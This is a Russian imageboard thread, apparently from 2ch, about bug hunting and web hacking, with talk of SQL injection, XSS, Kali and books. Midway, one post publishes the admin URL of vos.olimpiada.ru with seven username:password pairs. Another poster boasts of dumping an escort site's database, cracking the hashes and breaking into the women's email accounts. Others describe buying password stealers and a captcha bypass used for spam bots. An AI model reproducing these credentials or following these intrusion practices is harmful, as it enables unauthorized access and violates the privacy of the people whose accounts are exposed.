Сдал баг в vos.olimpiada.ru, починили, не ответили. Обидно, блядь.
Суть: задания доступны по "$link/2014_2015". Даешь 2014_AVGSD - хавает, дает за 2014/2015, ссылка на следующий год - "$link/AVGSD_".
ЖС втыкать не пробовал, но могло и пройти. Сейчас выдает 404 нп некорректные годы, лол, они статические сделали?
Суть: задания доступны по "$link/2014_2015". Даешь 2014_AVGSD - хавает, дает за 2014/2015, ссылка на следующий год - "$link/AVGSD_".
ЖС втыкать не пробовал, но могло и пройти. Сейчас выдает 404 нп некорректные годы, лол, они статические сделали?
Да всё те же уязвимости. Просто сейчас index.php?id= практически все прикрыты из-за популярности. Но остается rest и ajax.
Ну а друпалы и прочие популярные штуки только через плагины или слить стилером пароль от хостинга
>остается rest и ajax.
Понятно, спасибо.
Про друпалы тоже уже понял, что через плагины.
> слить стилером пароль от хостинга
Поясни, это как?
Ну это на школофорумы "куплю криптованый стилер/продам крипт стилеров, гарантия 100%"
Т.е. троянчик засылается человеку и грабит его пароли.
Не факт что он его запустит или АВ его не заблочит, но тема до сих пор популярная.
побольше тебя сделал
>Эти сканнеры юзает каждый мамкин-багхантер
скрипткидди, плис.
>Сдал баг в vos.olimpiada.ru, починили, не ответили. Обидно, блядь.
Хуй знает что они там починили.
+ как пруф тем, кто говорит что sql-inj не осталось в 2к17
А поясните тупому. Те пароли что браузер запоминает он хранит в открытом виде или максимум щифрует и все?
Опера в ванде хранила, сейчас все все шифруют вроде
это чем просканил?
KJK
Ту парашу с годами хоть закрыли.
> sqlmap resumed*
> чем
Но ведь ключ для шифрования где-то же лежит. Я к тому что я не настоящий сварщик, но перехват ключа и дешифровка на поверхности , нет?
я ни хакир прост, мимоанон.
Держите, спортсмены:
vos.olimpiada.ru/Admin/
vitar:rativ
Anka:lenochka
julia:pd52a2e
oleg-dja:12345
Shurka:p0dvAl
oCSKAo:12345
mbudrevich:vfntvfnbrf
vos.olimpiada.ru/Admin/
vitar:rativ
Anka:lenochka
julia:pd52a2e
oleg-dja:12345
Shurka:p0dvAl
oCSKAo:12345
mbudrevich:vfntvfnbrf
Что, авторизовался без прокси, петух, теперь решил замарать анончиков других?
Говен поешь.
Как ты ключ хочешь перехватить? Браузер может загрузить все до открытия страниц при запуске и расшифровать gpg ключом с паролем, например.
[email protected], если хочешь.
>2k17
>прокси
Но зачем? Пусть деньги у себя оставят, я не вымогатель.
>заливал шеллы
>сливал базы
>не смог написать спойлер без ошибок
>бамплимит
гг вп
Так сказал бы, что дырявые, деньги-то при чем?
Да пусть так остается, может кому-то на пользу будет или для тренировок по информатике, лол
>Forbidden
>You don't have permission to access / on this server.
годно
tools.kali.org
Годно.
Черт, хотел же ноут прихватить сегодня. щкольник тут
Я про статью о песочнице
Web Security Dojo
говно для скрипткидди, учат их мыслить однообразно.
гугли XSS
мне так вк 2к$ заплатили (но там мне повезло)
мимокрок
кстати, всё нихуя не так просто как звучит и кажется
Когда дорвеями занимался, оказывается XSS использовал, когда редиректил на партнёрки с профиля %). Когда-ж это было, пиздец-давно.
Я однажды нашёл способ отключить капчу на дваче. Абу взамен паскод предложил. И не согласился и решил побольше заработать. В торе покупать никто не захотел. Для того чтобы поиметь с этого профиты стал писать бота для спам рекламы. Клаудфлар блочил прокси. А вскоре абу прикрыл этот баг. Лучше бы взял пасскод.
начни с web hacking 101
потом на хабре был пост с книжками, гугли "книги по наступательной информационной безопасности" или чет такое
тот же мимокрок
Ну расскажи в чем бага была, все равно закрыта уже.
1
>web hacking 101
>книга
>2015
Видимо тема знатно протухла, но интересная, сука.
ПИДОРЫ
>2015
>знатно протухла
Тут до сих пор sql-inj и xss актуальны (а это минимум 2003г), а ему все мало.
В captcha_id в первых 12 символов был спрятан ответ на капчу. Если второй символ 0, то первый символ в капче 7, если второй символ в id f то ответ первый символ в капче 8. Написал простой скрипт и сидела без капчи пол года.
Прикольно. Это яндекса капча была или уже новая?
Новая. После того как он вернул капчу пришлось вайпалку переписывать. Скачал случайно много капч, отсортировал по имени и заметил какую-то закономерность.
Респект.
ОП хоть в правильном направлении направил?
Надоело кодить говно всякое однотипное, так хоть тех базу подтяну заодно.
Да.
Хочешь тех базу подтянуть читай Кнута, а не это гавно от скрипткиддисов.
Ты бы еще страус трупа посоветовал.
Ну как минимум подборка книг
"по наступательной информационной безопасности" которую анон посоветовал чёт не походит на крипткидди
Точно, ерунду посоветовал. Читай маны по Xspider.
>Не сливайте баги на хакерван.
Почему? Куда их сливать?
лол
сюда в тредик.
Двачую. Тут хоть интернетами и сотнями нефти платят за находки.
А чому все так не любят Кали?
я люблю
Поныне случаются прецеденты убийств современными тугами людей во имя Кали, подобные убийствам людей современными сектантами.
Потому что куча устаревшего и ненужного говна весом больше 4 GB. В реальности нужны от силы 5-10 программ упрощающих поиск и использование уязвимостей, текстовый редактор и компилятор любимого языка. Все это спокойно ставится из терминала на любом дистрибутиве. Юзать кали - это из пушки по воробьям стрелять.
>весом больше 4 GB
Трех, конечно. Перепутал с другим.
test
>компилятор
конпелятор же
Ребята, продержите тред до вечера, понимаю, что осталось меньше 50 постов, но все же...
В МЕСТЕ МЫ СИЛА!
ВСТУПАЙ И КОНПЕЛИРУЙ!
ВСТУПАЙ И КОМПЕЛИРУЙ! В МЕСТЕ МЫ СИЛА!
Лол, разум улья. БоХаЦэ - наше все, одепты. Заливайте шеллкодесы, конпелируйте 0дей, не будьте хуесосами.
А чего сразу не БоХаФэ?
Цэ.
Держу.
Да на архиваче уже есть.
Там ощущения не те. Все равно что хакать через проксю.
В 24 не поздно вкатываться в эту хуйню?
Немного шарю в программировании, специальность околоайтишная.
Немного шарю в программировании, специальность околоайтишная.
Лучше после 12 вкатываться и до 5 утра примерно. Меньше шансов застать админа за чтением логов.
Некоторые в режиме реального времени, без перерыва на сон, мониторят логи.
Я про возраст, бро. Нет, я понимаю, что не поздно, если действительно заинтересоваться. На первых парах можно как к хобби относиться, занимаясь вечером после работы этим. Но блять, чот мне кажется, что не все так радужно как оп написал и первые бабки (хотя б от продажи шелов) получится получать не менее, чем через полгода-год.
test
Вкатывайся, только на бабки не заморачивайся.
Ломай в свое удовольствие сначала. Пройди все круги ада новых технологий, а потом только о деньгах думай.
Алсо можно и на работе ломать, хули там, тыц-тыц - бага, скрипт запустил и пусть он расковыривает дальше.
Так и буду делать, пожалуй.
Лол. Я снова это сделал. На выходных буду без капчи сидеть.
Ну ты крут, еще раз респект.
Всегда пожалуйста.
Обращайся, если что.
Посоны, а чому страница не алертит?
Или хром для ХСС - моветон?
Или хром для ХСС - моветон?
да, хром блочит
можно обойти
Еще один дуст. Кек.
>дуст
Это сленг про багхантеров такой?
и лиса так же себя ведёт хз, короче.
Пойду ещё почитаю.
Потому что хуета какая-то. Парсер не посчитал твой тэг за тэг, иначе бы цветом выделил.
Некоторые хитрожопые парсеры например меняют в script с на русскую с.
Задампи страницу и смотри.
тест
Тред в архив и реквестрию ссылку.
Аноны, а где можно будет вопросы по задавать? На тех же формах, что оп кидал? Есть какая-нибудь двачерская конфа? Я помню тут раньше раздел был с набегами и большим количество всяческих писатлей вирусов/брутфорсеров.
тест
тест
есть конфа отдельных людей на пару человек
создай тред в каком то медленном разделе
тест
тест
Это по ходу реакт рендерит страницу данными из инпута на лету.
В воркаче безопасников тред есть.
ссылку
>раньше раздел был с набегами
Не сыпь мне соль на рану...
Золотые времена. Тогда еще была реальная возможность вкатиться в это все с помощью того же радмина. Эх.
Забей на радмин. Это не правильный путь развития.
Ну на дошик раньше точно можно было накопить, попутно развиваясь в правильном направлении. Это же все хакинг.
Как выключить XSS Auditor в хроме или в каком браузере его нет?
Дались тебе эти копейки. Наоборот на хобби тратить нужно, пока не достигнешь того уровня, когда это начнет приносить доход.
В фаерфоксе нет, или в старых операх.
Ну это та, воспоминания были.
Сейчас есть работа и хочу как хобби заняться багхантингом.
ОП, ты еще тут? Ответь, пожалуйста, с меткой ОПа, если здесь, будь добр.
BHC. Bugger Hukker Crew. Если не знаешь, кто это, то ты многое проебал. (и да, таки это был зомба)
А я пока продолжу лазить по почтам проституток.
Если вы вдруг, на какой-то момент, подумали что есть некие "индивидуалки" - то спешу вас расстроить.
Если вы вдруг, на какой-то момент, подумали что есть некие "индивидуалки" - то спешу вас расстроить.
Что думаешь с этим всем делать?
Соберу пак и дрочить буду.
Как вскрываешь ящики?
ТруЪ
Слил БД с сайта проституток, сбрутил хэши, пробую пароли к мыльцам. Частенько пароли подходят.
> Слил БД с сайта
Научи, а? Мне действительно не для заработка (и не майор я, ёбана рот, даже не капитан и вообще обычнохуй), а рили хобби хочу такое. Я тот хуй, что выше писал, что раньше кряками пытался заниматься.
Бля так вот кто на сарте выкладывает фото путан.
>крякми
Охуенно же.
Есть жаббер?
>туповат
>для программирования
Проиграл с этого.
Есть, но тут палить его не буду, вот фейкомыло [email protected]
Только не подумай, что я шарю в реверсинге, я уже все забыл, это были нулевые, извращались как могли
На сряклабе был, лол? Подтянешься, если что. Тут главное мозгами шевелить.
Отпишу сейчас на почту.
Был конечно! В те года, как не быть, и на васме был.
предпоследний бумп
https://docs.google.com/document/d/14cjCv29CAlTrUxXbRicysYPRKZjtTqCdOlPgR9JkwIg/edit?usp=sharing
Запили выжимку из ОП постов.
Запили выжимку из ОП постов.
А где найти Web Hacking 101 на русском , а то не все понятно там
Толсто.
>не все понятно там
Web - веб
Hacking - хакинг
101 - основы
Благодарю сударь , этого я и ждал
что толстого, или думаешь я гуглоадреса диванонить собрался?
У кого то есть курсы pwk, wifu,ctp?
Молю, нужны pdfки
Молю, нужны pdfки
нахуй ты бамплимит бампаешь?
ребята, возьмите меня под свое крыло в сфере какинга, вроде что-то умею, а вроде и нет, изи нахожу уязвимости на средних проектах, но вот эксплуатировать не получается, или waf мешает хуй знает что, а подобрать годный buypass(libinjection) не получается, вот мое мыло: [email protected] напишите кто-нибудь, пообщаемся в жабе или в телеге, я не майор!!! ищу партнера без регистрации по смс(те кто работают по ру, не пиши пожалуйста, идите нахуй)
@
Кто работает по ру, к тому приходят по утру :C
@
Кто работает по ру, к тому приходят по утру :C
Были трудности с реализацией юзерскрипта. я не знаю js Решил продать за пасскод. Но даже тут абу смог наебать. Он прислал не самый лучший. Надеюсь на год, а не полгода.
Я хакер.
Нахуй ты бампашь? Бамплимит же
Бля, надеюсь ночью будет еще один тред.
>Нахуй ты бампашь? Бамплимит же
он двач хакнул, невидеш чтоли
От того же опа?
Думаю пивца род такое дело взять.
Тестишь генератор предложений из рандомных слов? Ты выбрал идеально подходящее место для тестов.
Необязательно. Тут другие аноны тоже вкидывали годные вещи для новичков.
>пивца род
Вурст
Тогда можно самому перекат запилить
Автозамена же.
Ты хакер штоле?
Меня нахуй пошлют, лол. Я же не знаю ничего и бампать нечем.
Нет. Но мы же будем делать то же самое что и здесь. Ждать пока кто-то умный вкатится.
Cап, харкач, надеюсь ты достаточно ночной. Сегодня мы поговорим о таком фарме денежных знаков, как багхантинг. Коротко, это поиск уязвимостей как в вебе, так и в настольном софте. Я пока интересуюсь только вебом.
Не жди от меня готовых решений, как вот прямо сейчас взять и заработать много денег. Я могу лишь помочь тебе и дать удочку, чтобы выловить рыбку. Распишу, как вкатиться, с чего начать, что изучать, плюсы и минусы.
Бумажным безопасникам, которые ололо составляют "матрицы угроз", ковыряются в ГОСТах, чтобы написать очередную должностную инструкцию, которая нахуй никому не нужна и остальное время устанавливающие антивирусы на рабочих местах, вход в тред запрещен, ибо вы не практики, а говно на ложечке, но по своему опыту общения мните себя ниебаца спецами. Черные шляпы првиетствуются, потому что я и сам баловался заливкой шеллов и сливом баз[spoielr](работал не по ру, майор иди нахуй.)[/spoiler]
Итак, поехали.
Пикрелейтед выплата за баг, который я недавно нашел по программе поиска уязвимостей в Гугле.